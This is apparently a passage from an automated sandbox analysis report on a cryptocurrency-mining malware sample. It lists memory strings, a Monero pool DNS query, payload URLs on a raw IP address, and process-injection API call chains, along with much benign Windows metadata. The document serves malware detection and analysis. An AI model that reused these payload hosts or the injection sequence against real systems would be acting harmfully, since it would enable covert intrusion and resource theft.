","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                        Source: unknownDNS traffic detected: queries for: xmr-us-east1.nanopool.org
                        Source: P7Oa6i5muL.exe, jwMZjhPggeDR.exeString found in binary or memory: http://45.144.225.135/config.txt
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpString found in binary or memory: http://45.144.225.135/config.txtL
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpString found in binary or memory: http://45.144.225.135/config.txte=C:
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpString found in binary or memory: http://45.144.225.135/config.txtll
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpString found in binary or memory: http://45.144.225.135/config.txtx
                        Source: P7Oa6i5muL.exeString found in binary or memory: http://45.144.225.135/notepad.exe
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: svchost.exe, 00000019.00000002.348075440.0000024726937000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: svchost.exe, 0000000B.00000002.469172157.00000238089C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: svchost.exe, 0000000B.00000002.462497537.00000238030B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                        Source: svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmpString found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.219038679.0000000002FEF000.00000004.00000001.sdmpString found in binary or memory: https://RtlGetVersionntdll.dll
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comt
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                        Source: svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                        Source: svchost.exe, 00000019.00000003.326466123.000002472699D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.326515844.000002472694D000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        barindex
                        Source: C:\Windows\notepad.exeProcess Stats: CPU usage > 98%
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00402E40 GetLastError,NtOpenSection,NtMapViewOfSection,NtClose,5_2_00402E40
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00408A50 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose,5_2_00408A50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004068E0 RtlDosPathNameToNtPathName_U,NtCreateFile,5_2_004068E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00407AF0 GetFileAttributesW,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_00407AF0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403680 NtCreateFile,5_2_00403680
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_00403CA0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00406340 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree,5_2_00406340
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403B50 NtClose,5_2_00403B50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403720 NtCreateFile,NtCreateFile,5_2_00403720
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403BC0 NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_00403BC0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004037E0 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose,5_2_004037E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004029E0 DeleteFileW,RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,Sleep,Sleep,NtWaitForSingleObject,TerminateThread,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose,5_2_004029E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00406990 RtlDosPathNameToNtPathName_U,NtCreateFile,5_2_00406990
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004085B0 RtlInitUnicodeString,NtOpenKey,GetLastError,RtlInitUnicodeString,GetLastError,NtQueryValueKey,NtClose,NtClose,5_2_004085B0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00405420 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,5_2_00405420
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00406D50 NtClose,5_2_00406D50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00406D70 NtClose,5_2_00406D70
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00408730 NtOpenProcess,NtTerminateProcess,NtClose,5_2_00408730
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004087C0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_004087C0
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_014DC0F40_2_014DC0F4
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_014DE5280_2_014DE528
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_014DE5380_2_014DE538
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_07296F020_2_07296F02
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729DF100_2_0729DF10
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729B7B80_2_0729B7B8
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729E6800_2_0729E680
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729D2700_2_0729D270
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_072990700_2_07299070
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729274A0_2_0729274A
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_072985390_2_07298539
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_0729F3810_2_0729F381
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_072960600_2_07296060
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_073BBE930_2_073BBE93
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_073BBEC50_2_073BBEC5
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exeCode function: String function: 035D2F80 appears 35 times
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exeCode function: String function: 035D16E0 appears 63 times
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: String function: 00402F80 appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: String function: 004016E0 appears 63 times
                        Source: P7Oa6i5muL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe, 00000000.00000002.232059263.0000000007F00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.230495964.0000000007830000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs P7Oa6i5muL.exe
